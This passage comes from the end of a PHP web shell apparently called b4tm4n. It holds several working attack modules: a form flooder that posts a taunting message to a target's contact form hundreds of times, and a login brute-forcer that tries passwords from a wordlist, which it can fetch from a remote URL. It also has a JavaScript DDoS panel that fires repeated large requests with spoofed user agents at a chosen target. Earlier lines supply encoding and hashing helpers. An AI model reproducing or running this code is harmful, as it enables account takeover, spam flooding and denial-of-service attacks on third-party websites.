3331 return $str;
3332 }
3333
3334 function asc_hex($asc){
3335 $hex='';
3336 for ($i=0;$i<strlen($asc);$i++)
3337 $hex.=sprintf("%02x",ord(substr($asc,$i,1)));
3338 return $hex;
3339 }
3340
3341 function hex_asc($hex){
3342 $asc='';
3343 for ($i=0;$i<strlen($hex);$i+=2)
3344 $asc.=chr(hexdec(substr($hex,$i,2)));
3345 return $asc;
3346 }
3347
3348 function hex_bin($hex){
3349 $bin='';
3350 for($i=0;$i<strlen($hex);$i++)
3351 $bin.=str_pad(decbin(hexdec($hex{$i})),4,'0',STR_PAD_LEFT);
3352 return $bin;
3353 }
3354
3355 function bin_hex($bin){
3356 $hex='';
3357 for($i=strlen($bin)-4;$i>=0;$i-=4)
3358 $hex.=dechex(bindec(substr($bin,$i,4)));
3359 return strrev($hex);
3360 }
3361
3362 function asc_bin($asc){
3363 $hex=asc_hex($asc);
3364 return hex_bin($hex);
3365 }
3366
3367 function bin_asc($bin){
3368 $hex=bin_hex($bin);
3369 return hex_asc($hex);
3370 }
3371
3372 if(any("opt",$_REQUEST))
3373 {
3374 ob_clean();
3375 $opt=$_REQUEST['opt'];
3376 $text=base64_decode($_POST['text-encode']);
3377 if ($opt=='basic')
3378 {
3379 $hash=$_REQUEST['hash'];
3380 switch($hash)
3381 {
3382 case "md5":print md5($text);break;
3383 case "sha1":print sha1($text);break;
3384 case "chr":print asc_chr($text);break;
3385 case "asc":print chr_asc($text);break;
3386 case "crc32":print crc32($text);break;
3387 case "strlen":print strlen($text);break;
3388 case "strrev":print strrev($text);break;
3389 case "urlencode":print urlencode($text);break;
3390 case "urldecode":print urldecode($text);break;
3391 case "entties":print htmlentities($text);break;
3392 case "spechar":print htmlspecialchars($text);break;
3393 case "base64_encode":print base64_encode($text);break;
3394 case "base64_decode":print base64_decode($text);break;
3395 case "B64E":print B64E($text);break;
3396 case "B64D":print B64D($text);break;
3397 }
3398 }
3399 elseif($opt=='extra')
3400 {
3401 $hash=$_REQUEST['hash'];
3402 switch($hash)
3403 {
3404 case "chr-asc":print str_asc($text);break;
3405 case "asc-chr":print asc_str($text);break;
3406 case "asc-hex":print asc_hex($text);break;
3407 case "hex-asc":print hex_asc($text);break;
3408 case "hex-bin":print hex_bin($text);break;
3409 case "bin-hex":print bin_hex($text);break;
3410 case "asc-bin":print asc_bin($text);break;
3411 case "bin-asc":print bin_asc($text);break;
3412 }
3413 }
3414 elseif($opt=='crypt')
3415 {
3416 $salt=$_REQUEST['salt'];
3417 print crypt($text,$salt);
3418 }
3419 elseif($opt=='hash')
3420 {
3421 $hash=$_REQUEST['hash'];
3422 $raw=$_REQUEST['raw'];
3423 if($raw=='true')
3424 {
3425 print hash($hash,$text,true);
3426 }
3427 else
3428 {
3429 print hash($hash,$text);
3430 }
3431 }
3432 exit;
3433 }
3434 }
3435 if($z=="form-bruteforces")
3436 {
3437 print "<div class='tools-header'>
3438 <h3>".$menu_tools[$z]['title']." v".$menu_tools[$z]['ver']."</h3>
3439 <h3> by: ".$menu_tools[$z]['auth']."</h3>
3440 </div>";
3441
3442 $exp=array(
3443 '{',
3444 '"name":"Handsome",',
3445 '"email":"very@handsome.com",',
3446 '"subject":"WHOOPS YOU GOT E-MAIL ?!",',
3447 '"message":"HA HA HA HA HA HA HA HA",',
3448 '}');
3449
3450 printf("<div class='divide'>
3451 <div class='divide-left'>
3452 <form onsubmit='return false;' class='new'>
3453 <label>Url Action</label><input type='text' id='form-url' placeholder='http://'/><br>
3454 <label>Count's</label><input type='number' id='form-count' value='100' min='10' autocomplete='off'/><br>
3455 <label>Parameter (JSON)</label>
3456 <textarea id='form-parameter'>%s</textarea>
3457 <input type='submit' onclick=\"return ajaxAbort(true,'form-result')\" value=Cancel />
3458 <input type='submit' value='Attack' onclick=\"return getAjax(true,'form-result','POST','?z=form-bruteforces&url='+document.getElementById('form-url').value+'¶meter='+document.getElementById('form-parameter').value+'&count='+document.getElementById('form-count').value);\"/><br>
3459 </form>
3460 </div>
3461 <div class='divide-right'>
3462 <fieldset>
3463 <legend>Result's</legend>
3464 <div id='form-result' class='result'></div>
3465 </fieldset>
3466 </div>
3467 </div>",implode($exp,"\n"));
3468
3469 if(any("url",$_REQUEST)&&any("parameter",$_REQUEST))
3470 {
3471 ob_clean();
3472 $start=$succ=$fail=0;
3473 $url=$_REQUEST['url'];
3474 $count=$_REQUEST['count'];
3475 $parameter=$_REQUEST['parameter'];
3476 $content=json_decode($parameter,true);
3477 if(!is_array($content))$content=array();
3478 do {$start++;
3479 $ch=curl_init();
3480 curl_setopt($ch,CURLOPT_USERAGENT,$agent);
3481 curl_setopt($ch,CURLOPT_URL,$url);
3482 curl_setopt($ch,CURLOPT_POST,1);
3483 curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,10);
3484 curl_setopt($ch,CURLOPT_POSTFIELDS,http_build_query($content));
3485 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
3486 curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);
3487 $result=curl_exec($ch);
3488 $httpcode=curl_getinfo($ch,CURLINFO_HTTP_CODE);
3489 if(curl_error($ch)) echo curl_error($ch);
3490 curl_close($ch);
3491 if($httpcode==200)
3492 {
3493 $succ++;
3494 }
3495 else
3496 {
3497 $fail++;
3498 }
3499 if($start==$count)
3500 {
3501 echo "Success: $succ<br>Failed: $fail<br>Messages: ".htmlspecialchars($result);
3502 }
3503 }while($start<=$count);
3504 exit;
3505 }
3506 }
3507 if($z=="login-bruteforces")
3508 {
3509 print "<div class='tools-header'>
3510 <h3>".$menu_tools[$z]['title']." v".$menu_tools[$z]['ver']."</h3>
3511 <h3> by: ".$menu_tools[$z]['auth']."</h3>
3512 </div>";
3513
3514 printf("<div id='login-bruteforces'>
3515 <div class='divide-left'>
3516 <form onsubmit='return false;' class='new'>
3517 <label>Url Action</label><input type='text' id='login-url' placeholder='http://'/><br>
3518 <label>User List</label><input type='text' id='login-user' placeholder='admin' value='admin'/><br>
3519 <label> </label><input type='text' id='login-username' placeholder='User Fieldname'/><br>
3520 <label>Pass List</label><input type='text' id='login-passlist' placeholder='http://'/><br>
3521 <label> </label><input type='text' id='login-passname' placeholder='Pass Fieldname'/><br>
3522 <input type='submit' onclick=\"return getAjax(true,'login-result','POST',
3523 '?z=login-bruteforces'+
3524 '&url='+document.getElementById('login-url').value+
3525 '&user='+document.getElementById('login-user').value+
3526 '&userfield='+document.getElementById('login-username').value+
3527 '&passfield='+document.getElementById('login-passname').value+
3528 '&passlist='+document.getElementById('login-passlist').value);\"/><br>
3529 </form>
3530 </div>
3531 <div class='divide-right'>
3532 <fieldset>
3533 <legend>Result's</legend>
3534 <div id='login-result' class='result'></div>
3535 </fieldset>
3536 </div>
3537 </div>");
3538
3539 if(any("url",$_REQUEST)&&any("user",$_REQUEST))
3540 {
3541 ob_clean();
3542 $url=$_REQUEST['url'];
3543 $user=$_REQUEST['user'];
3544 $file=GetUrlExists($_REQUEST['passlist'])?
3545 GetUrlContent($_REQUEST['passlist']):
3546 $_REQUEST['passlist'];
3547 $words=explode("\n",$file);
3548 $length=count($words);
3549 foreach ($words as $index => $word)
3550 {
3551 $parameter=http_build_query(
3552 array(
3553 $_REQUEST['userfield'] => $user,
3554 $_REQUEST['passfield'] => $word,
3555 'Submit' => 'Submit',
3556 )
3557 );
3558 $ch=curl_init();
3559 curl_setopt($ch,CURLOPT_USERAGENT,$agent);
3560 curl_setopt($ch,CURLOPT_URL,$url);
3561 curl_setopt($ch,CURLOPT_POST,1);
3562 curl_setopt($ch,CURLOPT_TIMEOUT,5);
3563 curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,5);
3564 curl_setopt($ch,CURLOPT_POSTFIELDS,$parameter);
3565 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
3566 $ra=curl_exec($ch);
3567 $st=curl_getinfo($ch,CURLINFO_HTTP_CODE);
3568 if(curl_error($ch)) echo curl_error($ch);
3569 curl_close($ch);
3570 if ($st==200)
3571 {
3572 echo "FOUND'S: $user:$word<br>";
3573 exit;
3574 }
3575 else
3576 {
3577 echo htmlspecialchars($ra);
3578 }
3579 }
3580 exit;
3581 }
3582 }
3583 if($z=="mass-tools")
3584 {
3585 print "<div class='tools-header'>
3586 <h3>".$menu_tools[$z]['title']." v".$menu_tools[$z]['ver']."</h3>
3587 <h3> by: ".$menu_tools[$z]['auth']."</h3>
3588 </div>";
3589
3590 print "Coming Soon";
3591 }
3592 if($z=="ddos-attack")
3593 {
3594 print "<div class='tools-header'>
3595 <h3>".$menu_tools[$z]['title']." v".$menu_tools[$z]['ver']."</h3>
3596 <h3> by: ".$menu_tools[$z]['auth']."</h3>
3597 </div>";
3598
3599 printf('<script type="text/javascript">
3600
3601 window.onload=function(){
3602
3603 startTime();
3604
3605 var interval;
3606 var xhttp;
3607
3608 var requestsNode=document.getElementById("requests"),
3609 successNode=document.getElementById("success"),
3610 proccessNode=document.getElementById("proccess"),
3611 targetNode=document.getElementById("target"),
3612 attack=document.getElementById("attack"),
3613 method=document.getElementById("method"),
3614 size=document.getElementById("size"),
3615 time=document.getElementById("time"),
3616 stamp=document.getElementById("stamp")
3617 uagent=document.getElementById("uagent")
3618 referer=document.getElementById("referer")
3619 origin=document.getElementById("origin")
3620
3621 var requests=0,
3622 succeeded=0,
3623 proccess=0;
3624
3625 var makeHttpRequest=function(){
3626 var data=new FormData();
3627 var buff=new ArrayBuffer(65536);
3628 var xhrx=new XMLHttpRequest();
3629 var agent =["Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:5.0) Gecko/20110619 Firefox/5.0",
3630 "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:5.0) Gecko/20100101 Firefox/5.0",
3631 "Mozilla/5.0 (Windows NT 6.2; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0",
3632 "Mozilla/5.0 (Windows NT 5.2; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0",
3633 "Mozilla/5.0 (Windows NT 5.0; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0",
3634 "Mozilla/5.0 (Windows NT 5.1; U; rv:5.0) Gecko/20100101 Firefox/5.0",
3635 "Mozilla/5.0 (Windows NT 6.1.1; rv:5.0) Gecko/20100101 Firefox/5.0",
3636 "Mozilla/5.0 (Windows NT 5.1; rv:2.0.1) Gecko/20100101 Firefox/5.0",
3637 "Mozilla/5.0 (Windows NT 6.1; rv:6.0) Gecko/20100101 Firefox/5.0",
3638 "Mozilla/5.0 (Windows NT 5.0; rv:5.0) Gecko/20100101 Firefox/5.0"];
3639 randomize=function(arr){
3640 rand=Math.floor((Math.random()*arr.length));
3641 return arr[rand];}
3642 xhrx.open(method.value,targetNode.value,true);
3643 if (uagent.checked) xhrx.setRequestHeader("user-agent",randomize(agent));
3644 if (referer.checked) xhrx.setRequestHeader("referer",targetNode.value);
3645 if (origin.checked) xhrx.setRequestHeader("origin","*");
3646 xhrx.onreadystatechange=function(){
3647 if(xhrx.readyState==XMLHttpRequest.DONE){
3648 if(xhrx.status>=500){
3649 onSuccess();
3650 }
3651 onProcess();
3652 }
3653 onRequest();
3654 }
3655 xhttp=xhrx;
3656 attack=function(){
3657 str="";arr=new Uint32Array(buff);
3658 window.crypto.getRandomValues(arr);
3659 for(var i=0;i<arr.length;i++){
3660 str+=String.fromCharCode(arr[i]);
3661 }return str;}
3662 what=attack();
3663 for(var j=0;j<size.value;j++){
3664 data.append(what, stamp.value);}
3665 xhrx.send(data);
3666 };
3667
3668 var onRequest=function(){
3669 requests++;
3670 requestsNode.innerHTML=requests;
3671 };
3672
3673 var onProcess=function(){
3674 proccess++;
3675 proccessNode.innerHTML=proccess;
3676 };
3677
3678 var onSuccess=function(){
3679 success++;
3680 successNode.innerHTML=success;
3681 };
3682
3683 attack.onclick=function(){
3684 var today=new Date();
3685 var h=today.getHours();
3686 var m=today.getMinutes();
3687 var s=today.getSeconds();
3688 m=m<10?"0"+m:m;
3689 s=s<10?"0"+s:s;
3690 if(this.value==\'Start\'){
3691 this.value="Stop";
3692 requests=0;
3693 succeeded=0;
3694 proccess=0;
3695 document.getElementById("start").innerHTML="00:00:00";
3696 document.getElementById("finish").innerHTML="00:00:00";
3697 interval=setInterval(makeHttpRequest,(parseInt(time.value)));
3698 document.getElementById("start").innerHTML=h+":"+m+":"+s;
3699 }else if(this.value==\'Stop\'){
3700 this.value="Start";
3701 xhttp.abort();
3702 clearInterval(interval);
3703 document.getElementById("finish").innerHTML=h+":"+m+":"+s;
3704 }
3705 };
3706
3707 function startTime(){
3708 var today=new Date();
3709 var h=today.getHours();
3710 var m=today.getMinutes();
3711 var s=today.getSeconds();
3712 m=m<10?"0"+m:m;
3713 s=s<10?"0"+s:s;
3714 document.getElementById("times").innerHTML=h+":"+m+":"+s;
3715 var t=setTimeout(startTime,500);
3716 }
3717 }
3718 </script>
3719 <form onsubmit="return false;" class="new">
3720 <label>Target</label><input type="text" id="target" value="http://www.target.com"><br>
3721 <label>Stamp</label><input type="text" id="stamp" value="DDOS ATTACK !!!"><br>
3722 <label>Method</label><select id="method">
3723 <option value="PUT">PUT</option>
3724 <option value="GET">GET</option>
3725 <option value="POST">POST</option>
3726 <option value="HEAD">HEAD</option>
3727 <option value="TRACE">TRACE</option>
3728 <option value="PATCH">PATCH</option>
3729 <option value="OPTIONS">GET</option>
3730 <option value="DELETE">DELETE</option>
3731 <option value="CONNECT">CONNECT</option>
3732 <option value="OPTIONS">OPTIONS</option>
3733 </select><br>
3734 <label>Size (kB)</label><input type="number" id="size" value="1024"><br>
3735 <label>Time (ms)</label><input type="number" id="time" value="500"><br>
3736 <label>Options</label>
3737 <input type="checkbox" id="uagent" name="uagent" style="vertical-align:middle"> User Agent
3738 <input type="checkbox" id="referer" name="referer" style="vertical-align:middle"> Referer Target
3739 <input type="checkbox" id="origin" name="origin" style="vertical-align:middle"> Origin<br>
3740 <label style="margin:5px 0px 5px">
3741 Time <span id="times">00:00:00</span> |
3742 Start <span id="start">00:00:00</span> |
3743 Finish <span id="finish">00:00:00</span>
3744 </label><br>
3745 <label style="margin:0px 0px 5px">
3746 Requests <span id="requests">0</span> |
3747 Proccess <span id="proccess">0</span> |
3748 Success <span id="success">0</span>
3749 </label><br>
3750 <input type="submit" id="attack" value="Start"/>
3751 </form>');
3752 }
3753
3754 print "</div>";
3755}
3756/* END CUSTOM TOOLZ */
3757
3758printf("</div><!-- content -->
3759 </div><!-- container -->
3760 <div id='footer'>
3761 <div id='copyrights'><a href='//github.com/k4mpr3t/b4tm4n'>k4mpr3t</a> © %s</div>
3762 <div id='pageload'>Page Loaded in %s Seconds</div>
3763 </div>
3764 </body>
3765 </html>",date('Y'),round((microtime(true)-$start),2)
3766);
3767
3768}?>